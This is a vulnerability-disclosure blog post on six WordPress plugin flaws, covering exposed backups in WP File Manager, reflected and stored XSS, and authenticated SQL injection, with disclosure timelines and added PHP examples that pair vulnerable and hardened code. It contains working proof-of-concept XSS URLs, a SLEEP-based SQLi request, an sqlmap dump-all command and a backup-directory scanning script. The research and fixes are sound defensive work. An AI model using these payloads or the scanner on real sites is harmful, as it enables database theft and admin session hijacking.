WordPress Plugin Bug Hunting – Part 1

Guy and I recently decided to once again attempt to step into the world of bug hunting. Our previous attempts had been unsuccessful, and we decided that working together could help stave off the inevitable crushing “I can’t do this” feeling that I’m sure most beginners get.

We spent the next two weeks trawling plugins, documenting results and writing a very helpful bug hunting tool (more on this in the next post), and are pleased to report the following security vulnerabilities. The most significant is a sensitive information disclosure (exposed backups) in WP File Manager, which currently has 600,000 active installs and 6.2 million total downloads.

———————————————————————————————————————————————————————————————————————–

CVE-2020-24312 – WP File Manager v6.4 – Sensitive file disclosure (backups leak) 

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/wp-file-manager/
Vulnerable Version: 6.4 and less
Total Downloads: 6.2 Million
Active Installations: 600,000+
Author: mndpsingh287

Description

Backups made with this plugin are written to a web-accessible location that does not restrict access to the backed-up files. At best an attacker has to guess the backup file names; where the web server allows directory listing, the backups are completely exposed, as demonstrated below.

Highlights where backups are stored
Demonstrates a PoC: retrieving the backed-up SQL database without any cookies. This shows that authentication is not required to view these files and that the backup is publicly accessible.


An attacker can easily verify that the WP File Manager plugin is installed by requesting /wp-content/uploads/wp-file-manager-pro/fm_backup. This directory returns a 200 response code if the plugin has been installed and a 404 if not; a 403 (directory listing disabled on the web server) also confirms that the directory exists. If listing is disabled, it is still possible to brute force the names of the backup files. The names follow the structure backup_year_month_day_hour_minute_second_random-db.sql.gz, where a random number between 0 and 9999 is appended to the date/time stamp. Because the timestamp has one-second resolution, a blind brute force costs 10,000 candidate names for every second of uncertainty about when the backup was taken (864 million for a full day), so guessing is only practical when the backup time can be narrowed down, for example from a file date visible elsewhere on the site. With directory listing enabled, no guessing is needed at all.
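The following script is an added example, not code from the original post or from WP File Manager. It checks a site for the exposed backup directory described above and shows how the name structure sets the brute-force cost. It assumes the directory path /wp-content/uploads/wp-file-manager-pro/fm_backup/ and the name pattern backup_YYYY_MM_DD_HH_MM_SS_N-db.sql.gz with N in 0..9999; zero-padding of the date fields, and the sample directory listing embedded in the script, are assumptions/constructed data.

```php
<?php
// Added example (not from the original post or from WP File Manager). Checks a
// site for the exposed backup directory described above. Assumed: the directory
// path /wp-content/uploads/wp-file-manager-pro/fm_backup/ and the name pattern
// backup_YYYY_MM_DD_HH_MM_SS_N-db.sql.gz with N in 0..9999; zero-padding of the
// date fields is an assumption.

const FM_BACKUP_PATH     = '/wp-content/uploads/wp-file-manager-pro/fm_backup/';
const FM_RANDOM_SUFFIXES = 10000;   // random suffix is 0..9999

// Classify the response to a GET of the backup directory.
function classify_backup_dir(int $status, string $body): string
{
    if ($status === 404) {
        return 'not-installed';
    }
    if ($status === 200 && stripos($body, 'Index of') !== false) {
        return 'installed-listing-enabled';   // worst case: every backup name is visible
    }
    if ($status === 200 || $status === 403) {
        return 'installed-listing-disabled';  // present, but names must be guessed
    }
    return 'unknown';
}

// Pull backup file names out of an Apache/nginx style index page.
function extract_backup_names(string $html): array
{
    preg_match_all('~backup_\d{4}_\d{2}_\d{2}_\d{2}_\d{2}_\d{2}_\d{1,4}-db\.sql\.gz~', $html, $m);
    return array_values(array_unique($m[0]));
}

// Names an attacker must try to cover a window of $seconds when the backup
// time is known only to that precision (10,000 suffixes per candidate second).
function backup_search_space(int $seconds): int
{
    return $seconds * FM_RANDOM_SUFFIXES;
}

// All candidate names for one known second.
function candidate_names(DateTimeImmutable $t): Generator
{
    for ($n = 0; $n < FM_RANDOM_SUFFIXES; $n++) {
        yield sprintf('backup_%s_%d-db.sql.gz', $t->format('Y_m_d_H_i_s'), $n);
    }
}

// Live check (needs network): fetch the directory and classify the response.
function check_site(string $baseUrl): string
{
    $ctx    = stream_context_create(['http' => ['ignore_errors' => true, 'timeout' => 10]]);
    $body   = @file_get_contents(rtrim($baseUrl, '/') . FM_BACKUP_PATH, false, $ctx);
    $status = 0;
    foreach ($http_response_header ?? [] as $header) {
        if (preg_match('~^HTTP/\S+\s+(\d{3})~', $header, $m)) {
            $status = (int) $m[1];
        }
    }
    return classify_backup_dir($status, (string) $body);
}

// Constructed sample listing (not from a real site) so the offline path runs.
$sampleListing = <<<'HTML'
<html><head><title>Index of /wp-content/uploads/wp-file-manager-pro/fm_backup</title></head>
<body><h1>Index of /wp-content/uploads/wp-file-manager-pro/fm_backup</h1>
<a href="../">Parent Directory</a>
<a href="backup_2020_06_11_14_05_09_4821-db.sql.gz">backup_2020_06_11_14_05_09_4821-db.sql.gz</a>
</body></html>
HTML;

echo classify_backup_dir(200, $sampleListing), "\n";
print_r(extract_backup_names($sampleListing));
echo number_format(backup_search_space(86400)), " names to cover one day of uncertainty\n";
echo candidate_names(new DateTimeImmutable('2020-06-11 14:05:09'))->current(), "\n";
if (isset($argv[1])) {
    echo check_site($argv[1]), "\n";   // php check.php https://example.com
}
```

Run it with a base URL as the first argument to perform the live check; without one it only exercises the constructed listing. On the defensive side the fix is the same whatever the plugin does: deny web access to the backup directory at the web server (an .htaccess with Require all denied, or an nginx location block returning 403) and, ideally, keep backups outside the document root altogether, since an unpredictable file name only slows an attacker down when listing is disabled.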

Demonstrates confirming WP File Manager is installed, which allows easy identification of potentially vulnerable websites.


Google dork results
Directory listing of exposed backups, including a full SQL database


Timeline

11 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team
11 Jun 2020 – Reply from Plugin Security team to clarify plugin
18 Jun 2020 – Reply from plugin Security team to say they’re looking into it
18 Jun 2020 – Patch released
10 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-24314 – RSS Feed Widget v2.7.9 – Reflected XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/rss-feed-widget/advanced/
Vulnerable Version: 2.7.9 and less
Total Downloads: 164,000
Active Installations: >5000
Author: Fahad Mahmood
Link to vulnerable version: https://downloads.wordpress.org/plugin/rss-feed-widget.2.7.9.zip

Description

The t GET parameter in settings.php is neither sanitized nor escaped before being reflected back to the user. After closing the input tag’s value attribute with 1"> in the t parameter, we can inject arbitrary HTML tags, including <script> tags, to execute JavaScript. The result is a reflected XSS vulnerability, shown in the following example.

Reflected XSS in the ‘t’ GET parameter
POC
/wp-admin/admin.php?page=rfw_options&t=1"><script>alert("xss")</script>
Vulnerable Code

Numerous vulnerable lines exist in settings.php where the ‘t’ GET parameter is echoed out to the page without escaping. This occurs once for each tab in the settings page.

Example of one of the unsanitized uses of the t param
Timeline

20 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team
23 Jun 2020 – Reply from Plugin Security team that they’re investigating
23 Jun 2020 – Patch released
10 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-24313 – Ultimate Appointment Scheduling v1.1.9 – Reflected XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/ultimate-appointment-scheduling/
Vulnerable Version: v1.1.9 and less
Total Downloads: 37,000
Active Installations: >800
Author: Etoile Web Design
Link to vulnerable version: https://downloads.wordpress.org/plugin/ultimate-appointment-scheduling.1.1.9.zip

Description

The Appointment_ID GET parameter in AppointmentDetailsPage.php is reflected into the page without escaping, making it vulnerable to reflected XSS.

Reflected XSS in appointment ID
POC
/wp-admin/admin.php?page=EWD-UASP-options&Action=EWD_UASP_AppointmentDetails&Selected=Appointment&Appointment_ID=1"><script>alert(1)</script>
Vulnerable Code

The vulnerable code is at line 28 of /html/AppointmentDetailsPage.php, where the Appointment_ID GET parameter is echoed directly into an input tag without being escaped.

Appointment_Id parameter being echoed without sanitization
Timeline

19 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team
19 Jun 2020 – Reply from Plugin Security team that they’re investigating
?? Jun 2020 – Patch released
10 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-24315 – WordPress Poll v36 – Authenticated SQLI

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/cardoza-wordpress-poll/
Vulnerable Version: v36 and less
Total Downloads: 99,434
Author: Vinoj Cardoza

Description

Within the Cardoza WordPress Poll plugin, the pollid POST parameter of the deletepoll admin-ajax action is vulnerable to authenticated, time-based blind SQL injection when submitting a poll deletion request.

Time-based SQL injection in the pollid POST parameter
POC
POST /wp-admin/admin-ajax.php?nonce=5be849732a HTTP/1.1
Host: headache.zeroaptitude.com
Connection: close
Content-Length: 66
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://headache.zeroaptitude.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://headache.zeroaptitude.com/wp-admin/admin.php?page=cwp_poll
Accept-Encoding: gzip, deflate
Accept-Language: en-AU,en-GB;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: <Insert your cookies here>

action=deletepoll&pollid=(SELECT 2822 FROM (SELECT(SLEEP(5)))gsJu)

Or, using sqlmap with the request above saved to req.txt:

python sqlmap.py -r req.txt -p pollid --risk=3 --level=5 --dbms=mysql --technique=T --dump-all
SQLMap Confirming SQLI
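The script below is an added example and not the Cardoza WordPress Poll plugin’s code. It reconstructs the pattern behind the pollid injection (a POST value concatenated into a DELETE statement) beside a hardened version that validates and parameterises the id. The table name, the column name, the exact original query and the minimal $wpdb stand-in are assumptions made so the file runs from the command line.

```php
<?php
// Added example, not the Cardoza WordPress Poll plugin's code. Reconstructs the
// pattern behind the pollid injection (a POST value concatenated into a DELETE)
// beside a hardened version. The table name, the column name and the exact
// original query are assumptions.

// Minimal stand-in for $wpdb so both builders run from the CLI. Only the %d
// placeholder is emulated; the real $wpdb->prepare() also handles %s and %f.
class FakeWpdb
{
    public string $prefix = 'wp_';

    public function prepare(string $query, ...$args): string
    {
        return vsprintf($query, array_map('intval', $args));
    }
}

// Vulnerable: whatever arrives in pollid becomes part of the SQL text, so the
// subquery (SELECT 2822 FROM (SELECT(SLEEP(5)))gsJu) is evaluated by MySQL and
// the 5 second delay is what sqlmap's --technique=T measures.
function delete_poll_query_vulnerable(FakeWpdb $wpdb, array $post): string
{
    return "DELETE FROM {$wpdb->prefix}cwp_polls WHERE pollid = " . ($post['pollid'] ?? '');
}

// Hardened: reject anything that is not a decimal id before touching SQL, then
// bind the value through prepare() with %d. Rejecting, rather than coercing
// with (int) (which would silently turn the payload into 0), also makes
// tampering visible in logs.
function delete_poll_query_hardened(FakeWpdb $wpdb, array $post): ?string
{
    $raw = $post['pollid'] ?? '';
    if (!is_string($raw) || !ctype_digit($raw)) {
        return null;   // refused before any SQL is built
    }
    return $wpdb->prepare("DELETE FROM {$wpdb->prefix}cwp_polls WHERE pollid = %d", (int) $raw);
}

$wpdb   = new FakeWpdb();
$attack = ['pollid' => '(SELECT 2822 FROM (SELECT(SLEEP(5)))gsJu)'];
$normal = ['pollid' => '42'];

echo delete_poll_query_vulnerable($wpdb, $attack), "\n";
var_dump(delete_poll_query_hardened($wpdb, $attack));
echo delete_poll_query_hardened($wpdb, $normal), "\n";
```

In the real admin-ajax handler this sits behind check_ajax_referer() (the PoC request carries a nonce, which is why the bug is authenticated) and a current_user_can() capability check. Neither replaces parameterisation: any user who is legitimately allowed to delete a poll could still inject through the concatenated query.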
Timeline

21 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team
23 Jun 2020 – Reply from Plugin Security team that they’re investigating
23 Jun 2020 – Plugin closed (not likely to be patched)
10 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

CVE-2020-24316 – Admin Menu v1.1 – Reflected XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/admin-menu/
Version: 1.1
Total Downloads: 2592
Author: Rednumber

Description

The role GET parameter used by Admin Menu is not sanitized or escaped before being reflected back to the user. This results in a reflected XSS vulnerability that can be seen in the following example.

XSS Payload execution from the ‘role’ GET parameter
POC
http://<wordpress site>/wp-admin/admin.php?page=admin-menu-pro&role=<script>alert(String.fromCharCode(88,83,83))</script>
Vulnerable Code

The vulnerable code can be found in the admin-menu/class/settings.php file on lines 81 and 176.

Line 81 reads the role GET parameter into the variable $role, which is never sanitized and is finally echoed back to the user on line 176.


Line 81: ‘role’ parameter being read into the $role variable without sanitizing user input
$role parameter being echoed back to the user after having never been sanitized
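The three reflected XSS issues above (the t parameter in RSS Feed Widget, Appointment_ID in Ultimate Appointment Scheduling and role in Admin Menu) share one pattern: a GET value echoed into a value="" attribute without escaping. The script below is an added example, not code from any of the three plugins. The vulnerable function reconstructs the described pattern, the tab and role names are assumptions, and the function_exists() shims only stand in for the real WordPress helpers so the file runs from the command line.

```php
<?php
// Added example, not code from RSS Feed Widget, Ultimate Appointment Scheduling
// or Admin Menu. The "vulnerable" function reconstructs the described pattern
// (a GET value echoed into a value="" attribute); the tab and role names below
// are assumptions. The shims only exist so the file runs from the CLI; inside
// WordPress the real esc_attr(), sanitize_key(), absint() and wp_unslash() apply.
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('sanitize_key')) {
    function sanitize_key(string $s): string {
        return preg_replace('/[^a-z0-9_\-]/', '', strtolower($s));
    }
}
if (!function_exists('absint')) {
    function absint($v): int { return abs((int) $v); }
}
if (!function_exists('wp_unslash')) {
    function wp_unslash($v) { return is_string($v) ? stripslashes($v) : $v; }
}

// Vulnerable: the raw value lands inside value="...", so a payload starting
// with 1"> closes the attribute and the tag and the rest is parsed as HTML.
function render_tab_vulnerable(array $get): string
{
    return '<input type="hidden" name="t" value="' . ($get['t'] ?? '') . '">';
}

// Hardened, in two layers. First, validate to the type the parameter really
// has: a tab name is a slug (sanitize_key + allow-list), an appointment id is
// an integer (absint), a role must be one of the site's roles (allow-list).
// Second, escape for the exact output context at the echo (esc_attr inside an
// attribute). Escaping alone already stops the injection; validation keeps
// junk out of the rest of the page logic.
function render_tab_hardened(array $get, array $knownTabs): string
{
    $t = sanitize_key(wp_unslash($get['t'] ?? ''));
    if (!in_array($t, $knownTabs, true)) {
        $t = $knownTabs[0];   // unknown tab: fall back to the default tab
    }
    return '<input type="hidden" name="t" value="' . esc_attr($t) . '">';
}

function render_appointment_id_hardened(array $get): string
{
    $id = absint($get['Appointment_ID'] ?? 0);
    return '<input type="hidden" name="Appointment_ID" value="' . esc_attr((string) $id) . '">';
}

function render_role_hardened(array $get, array $siteRoles): ?string
{
    $role = sanitize_key(wp_unslash($get['role'] ?? ''));
    if (!in_array($role, $siteRoles, true)) {
        return null;          // unknown role: refuse rather than reflect it
    }
    return '<input type="hidden" name="role" value="' . esc_attr($role) . '">';
}

// The three payloads from the PoCs above, fed to each renderer.
$get = [
    't'              => '1"><script>alert("xss")</script>',
    'Appointment_ID' => '1"><script>alert(1)</script>',
    'role'           => '<script>alert(String.fromCharCode(88,83,83))</script>',
];
echo "vulnerable : ", render_tab_vulnerable($get), "\n";
echo "tab        : ", render_tab_hardened($get, ['general', 'advanced']), "\n";
echo "appointment: ", render_appointment_id_hardened($get), "\n";
var_dump(render_role_hardened($get, ['administrator', 'editor', 'subscriber']));
```

The escaping function has to match the sink: esc_attr() for attribute values, esc_html() for text between tags, esc_url() for href/src. Admin pages are still worth fixing even though the victim must be logged in; the attacker only needs an administrator to open a crafted link, and the resulting JavaScript runs with that administrator’s session.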


Timeline

15 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team
17 Jun 2020 – Plugin closed for downloads
18 Jun 2020 – Reply from Plugin Security team that they’re investigating
8 Aug 2020 – Public write up and CVE Submission

———————————————————————————————————————————————————————————————————————–

Very Simple Quiz v1.0.0 – Stored XSS

Details

Tested Against: WordPress v5.4.1
Plugin: https://wordpress.org/plugins/very-simple-quiz/
Version: 1.0.0
Total Downloads: 2706
Author: Brijesh

Description
Vulnerability 1

The first is in the “Quiz Name” field when creating a new quiz (or editing an existing quiz’s name). An XSS payload stored in the quiz name executes whenever a quiz administrator later edits the quiz name. Of note, since the stored quiz name is passed in the ‘edit_quiz_name’ GET parameter, the same sink can also be hit as reflected XSS.

Preparing the first XSS vuln
Clicking Edit Name executes the payload
XSS Execution


Vulnerability 2

The second stored XSS lies in the “question” field within quizzes. The question is stored and the payload executes immediately after the admin clicks “Add question”. It also executes when an admin later clicks “edit” on the quiz, and when any visitor, authenticated or not, views the quiz on a page it has been placed on in WordPress.

Setting up the second stored XSS payload
Executing the payload as a logged in user
Unauthenticated user executing payload


Vulnerabilities 3 and 4

The third and fourth stored XSS vulnerabilities both exist inside the “filter results” section of the plugin. The “Result page shown” and “custom text to show on result page” fields store XSS payloads that execute when admins visit the “filter result” tab, as well as when site users take the quiz and are redirected to the results page.

Creating the 3rd and 4th Stored XSS
Clicking either of those will execute the payload
XSS Execution
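All four Very Simple Quiz issues are the same defect seen at different sinks: a value saved as entered and echoed raw into the admin forms and the public quiz page. The script below is an added example, not Very Simple Quiz code. It walks the quiz name (which also travels through the edit_quiz_name GET parameter) through a vulnerable and a hardened save/render path; the option key, the shape of the edit link and the sample payload are constructed, and the shims approximate the WordPress helpers so the file runs from the command line.

```php
<?php
// Added example, not Very Simple Quiz code. Shows the sanitize-on-save and
// escape-on-output discipline that closes the four stored XSS issues described
// above, using the quiz name (which also travels through the edit_quiz_name GET
// parameter) as the worked case; the option key and the edit link shape are
// assumptions. The shims approximate the WordPress helpers so this runs from
// the CLI; inside WordPress the real functions are used.
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string { return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
}
if (!function_exists('esc_html')) {
    function esc_html(string $s): string { return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
}
if (!function_exists('wp_unslash')) {
    function wp_unslash($v) { return is_string($v) ? stripslashes($v) : $v; }
}
if (!function_exists('sanitize_text_field')) {
    // Approximation of the WordPress original: strip tags and control bytes,
    // collapse whitespace.
    function sanitize_text_field(string $s): string {
        $s = strip_tags($s);
        $s = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', '', $s);
        return trim(preg_replace('/\s+/', ' ', $s));
    }
}

// Vulnerable flow: stored raw, echoed raw. The same string reaches three sinks:
// the admin edit form (attribute), the edit link (URL), and the public quiz
// page (HTML body), which is why an unauthenticated visitor can trigger it.
function save_quiz_vulnerable(array &$store, array $post): void
{
    $store['quiz_name'] = $post['quiz_name'] ?? '';
}
function render_quiz_vulnerable(array $store): array
{
    $name = $store['quiz_name'];
    return [
        'edit_form' => '<input name="edit_quiz_name" value="' . $name . '">',
        'edit_link' => '<a href="admin.php?page=vsq&edit_quiz_name=' . $name . '">Edit Name</a>',
        'front_end' => '<h2>' . $name . '</h2>',
    ];
}

// Hardened flow. sanitize_text_field() at save time limits what can be stored
// at all; the escape at each sink is what actually prevents execution, and it
// must match the context: esc_attr() in an attribute, rawurlencode() for a
// query-string value (then esc_attr on the href), esc_html() in the body.
function save_quiz_hardened(array &$store, array $post): void
{
    $store['quiz_name'] = sanitize_text_field(wp_unslash($post['quiz_name'] ?? ''));
}
function render_quiz_hardened(array $store): array
{
    $name = $store['quiz_name'] ?? '';
    $href = 'admin.php?page=vsq&edit_quiz_name=' . rawurlencode($name);
    return [
        'edit_form' => '<input name="edit_quiz_name" value="' . esc_attr($name) . '">',
        'edit_link' => '<a href="' . esc_attr($href) . '">Edit Name</a>',
        'front_end' => '<h2>' . esc_html($name) . '</h2>',
    ];
}

// Constructed payload; the post does not give the exact strings used.
$post  = ['quiz_name' => 'My quiz"><script>alert(document.domain)</script>'];
$store = [];
save_quiz_vulnerable($store, $post);
print_r(render_quiz_vulnerable($store));
save_quiz_hardened($store, $post);
print_r(render_quiz_hardened($store));
```

The question field and the two “filter results” fields follow the same path. If a field legitimately needs to hold HTML (the custom result text, for instance), store it through wp_kses_post() and output it with wp_kses_post() instead of esc_html(). The save handler itself should sit behind check_admin_referer() and a current_user_can() check, and the receiving side of the edit_quiz_name link should treat the GET value exactly like fresh input: wp_unslash(), sanitize, then escape at output.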
Timeline

19 Jun 2020 – Discovery and report submission to the WordPress Plugin Security Team
19 Jun 2020 – Plugin closed for downloads (unlikely to ever be fixed; it’s old)
19 Jun 2020 – Reply from Plugin Security team that they’re investigating
10 Aug 2020 – Public write up and CVE Submission
